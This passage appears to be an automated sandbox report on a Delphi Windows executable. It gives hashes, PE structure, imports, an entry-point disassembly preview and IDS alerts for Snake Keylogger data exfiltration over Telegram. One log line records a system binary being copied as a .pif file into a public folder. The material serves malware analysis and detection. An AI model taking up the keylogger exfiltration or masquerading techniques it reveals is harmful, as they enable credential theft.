                                                                                                                SHA-512:416A523D818695D54E30B8261E6D3F60C88C4E9188C3459CCF8AD60773A6DBE2D7C5ABBAABD98CAA329598FCD3FED62FC440313F54AE4027B39F82D6A046BD86
                                                                                                                Malicious:false
                                                                                                                Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.94 seconds.....

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.351894430686878
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                                                                • Windows Screen Saver (13104/52) 0.13%
                                                                                                                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                File name:EPTMAcgvNZ.exe
                                                                                                                File size:1'297'920 bytes
                                                                                                                MD5:dc614075998696b44ada8a2eed23fc03
                                                                                                                SHA1:911b29ff40b13f6935568153f178867e10946311
                                                                                                                SHA256:059971ff3a7ed8438ae50f1ae60bc161e93c0b32f8a2b3c5a0e56bbfa05d9cd5
                                                                                                                SHA512:abd7c8f466b5c856a1a0862180598fbf32b9854ec4c4d6529c0fc3b45f642f538b2e52a5ad27c913f164b74306240bf84082d2dd69c8998a233c7379b749646b
                                                                                                                SSDEEP:24576:uPHhFG0TMHw0kEWIo7rVTR8XzSz4FMzDVW1SKCDH7:uPBZIMJTmjSmM3UxAH7
                                                                                                                TLSH:B4556A05E3C24D31D9322B3B580EB2ED67192D105B1C6B6AE6B5FA3D6B317D32CB1162
                                                                                                                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                                File Icon

                                                                                                                Icon Hash:13d8d8d6d6d8f807

                                                                                                                Static PE Info

                                                                                                                General

                                                                                                                Entrypoint:0x4828b0
                                                                                                                Entrypoint Section:.itext
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                DLL Characteristics:
                                                                                                                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:4
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:4
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:4
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:f2d415c3d34c0a24d257d94e8f95599e

                                                                                                                Entrypoint Preview

                                                                                                                Instruction
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                add esp, FFFFFFF0h
                                                                                                                mov eax, 00481AACh
                                                                                                                call 00007FA1C4683881h
                                                                                                                mov eax, dword ptr [00491B54h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007FA1C46D5CADh
                                                                                                                mov ecx, dword ptr [00491970h]
                                                                                                                mov eax, dword ptr [00491B54h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                mov edx, dword ptr [00481108h]
                                                                                                                call 00007FA1C46D5CADh
                                                                                                                mov eax, dword ptr [00491B54h]
                                                                                                                mov eax, dword ptr [eax]
                                                                                                                call 00007FA1C46D5D21h
                                                                                                                call 00007FA1C4681834h
                                                                                                                lea eax, dword ptr [eax+00h]
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al
                                                                                                                add byte ptr [eax], al

                                                                                                                Data Directories

                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x960000x2812.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xa30000xa1e00.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x9b0000x786c.reloc
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x9a0000x18.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x967500x638.idata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                Sections

                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x80d1c0x80e00ce9e32a578f605edc36b7ea8c4427908False0.5213801830746848data6.567524934010026IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .itext0x820000x8f80xa00d652a5e6b7fe80b40eaa3b2da77699feFalse0.5734375data5.875113409165235IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .data0x830000xece40xee0092902b2dc8013b896f372dba0ec686b4False0.26281840861344535data6.5089029021829345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .bss0x920000x3afc0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .idata0x960000x28120x2a0070d29339d31ba0f5bc4fe8f46c8d2d79False0.30747767857142855data4.945605499302349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .tls0x990000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rdata0x9a0000x180x2008f688f4da7785346d6867ce13b4d34acFalse0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .reloc0x9b0000x786c0x7a0051d6abfc6b6519b195c4c65d65564755False0.6299628586065574data6.669232989160023IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                .rsrc0xa30000xa1e000xa1e00bbe37615e620d624d6bab28e8432c47fFalse0.6572876447876448data7.53541735334072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                Resources

                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_CURSOR0xa3b5c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                RT_CURSOR0xa3c900x134dataEnglishUnited States0.4642857142857143
                                                                                                                RT_CURSOR0xa3dc40x134dataEnglishUnited States0.4805194805194805
                                                                                                                RT_CURSOR0xa3ef80x134dataEnglishUnited States0.38311688311688313
                                                                                                                RT_CURSOR0xa402c0x134dataEnglishUnited States0.36038961038961037
                                                                                                                RT_CURSOR0xa41600x134dataEnglishUnited States0.4090909090909091
                                                                                                                RT_CURSOR0xa42940x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                RT_BITMAP0xa43c80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                RT_BITMAP0xa45980x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                                                                RT_BITMAP0xa477c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                                                                RT_BITMAP0xa494c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                                                                RT_BITMAP0xa4b1c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                                                                RT_BITMAP0xa4cec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                                                                RT_BITMAP0xa4ebc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                                                                RT_BITMAP0xa508c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                RT_BITMAP0xa525c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                                                                RT_BITMAP0xa542c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                                                                RT_BITMAP0xa55fc0x99eacDevice independent bitmap graphic, 585 x 359 x 24, image size 630404, resolution 2835 x 2835 px/mEnglishUnited States0.6784155293729499
                                                                                                                RT_BITMAP0x13f4a80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                                                                RT_ICON0x13f5900x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.15173410404624277
                                                                                                                RT_ICON0x13faf80x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 67200.06405325443786983
                                                                                                                RT_ICON0x1415600x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 16800.15930232558139534
                                                                                                                RT_ICON0x141c180x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.17907801418439717
                                                                                                                RT_DIALOG0x1420800x52data0.7682926829268293
                                                                                                                RT_DIALOG0x1420d40x52data0.7560975609756098
                                                                                                                RT_STRING0x1421280x2e0data0.4592391304347826
                                                                                                                RT_STRING0x1424080xdcdata0.6545454545454545
                                                                                                                RT_STRING0x1424e40xd8data0.6574074074074074
                                                                                                                RT_STRING0x1425bc0x108data0.6174242424242424
                                                                                                                RT_STRING0x1426c40x448data0.40145985401459855
                                                                                                                RT_STRING0x142b0c0x394data0.3864628820960699
                                                                                                                RT_STRING0x142ea00x354data0.4014084507042254
                                                                                                                RT_STRING0x1431f40x3ccdata0.33539094650205764
                                                                                                                RT_STRING0x1435c00x214data0.49624060150375937
                                                                                                                RT_STRING0x1437d40xccdata0.6274509803921569
                                                                                                                RT_STRING0x1438a00x194data0.5643564356435643
                                                                                                                RT_STRING0x143a340x3c4data0.3288381742738589
                                                                                                                RT_STRING0x143df80x338data0.42961165048543687
                                                                                                                RT_STRING0x1441300x294data0.42424242424242425
                                                                                                                RT_RCDATA0x1443c40x10data1.5
                                                                                                                RT_RCDATA0x1443d40x340data0.6887019230769231
                                                                                                                RT_RCDATA0x1447140x51eDelphi compiled form 'TMainForm'0.48931297709923666
                                                                                                                RT_GROUP_CURSOR0x144c340x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                RT_GROUP_CURSOR0x144c480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                RT_GROUP_CURSOR0x144c5c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x144c700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x144c840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x144c980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_CURSOR0x144cac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                RT_GROUP_ICON0x144cc00x3edata0.9032258064516129

                                                                                                                Imports

                                                                                                                DLLImport
                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                                                user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetPaletteEntries, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, ResizePalette, Rectangle, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                                                                                                                version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                                                kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SuspendThread, Sleep, SizeofResource, SetThreadPriority, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetExitCodeThread, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                                                                advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                                                                kernel32.dllSleep
                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                                                                comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls

                                                                                                                Possible Origin

                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishUnited States

                                                                                                                Network Behavior

                                                                                                                Suricata IDS Alerts

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-11-26T08:24:42.922117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749702185.166.143.48443TCP
                                                                                                                2024-11-26T08:24:45.662912+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970316.182.70.225443TCP
                                                                                                                2024-11-26T08:25:08.912759+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749742149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:19.825821+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749764149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:21.178091+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749770149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:23.204892+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749775149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:23.946619+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749776149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:26.049970+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749781149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:28.010639+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749786149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:32.576254+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749791149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:32.586543+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749793149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:34.569182+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749803149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:34.654030+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749802149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:35.355516+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749806149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:36.477132+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749810149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:36.566754+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749811149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:37.286947+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749813149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:38.453268+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749817149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:38.596417+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749818149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:39.254460+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749821149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:40.506102+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749823149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:40.690385+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749825149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:41.309105+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749828149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:42.559961+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749831149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:42.660893+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749832149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:43.283332+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749836149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:44.896641+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749840149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:44.936818+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749839149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:46.081878+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749842149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:46.878546+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749846149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:46.926538+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749847149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:48.241922+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749850149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:49.140464+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749854149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:49.173504+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749855149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:50.267456+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749858149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:51.080992+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749864149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:51.119037+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749863149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:52.281538+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749867149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:53.054025+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749868149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:53.204327+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749870149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:54.375472+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749876149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:55.122672+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749878149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:55.229963+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749877149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:59.252785+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749884149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:59.286116+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749887149.154.167.220443TCP
                                                                                                                2024-11-26T08:25:59.310128+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749886149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:01.252796+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749898149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:01.277971+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749897149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:01.291141+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749899149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:03.351666+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749904149.154.167.220443TCP
                                                                                                                2024-11-26T08:26:03.370309+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.749905149.154.167.220443TCP
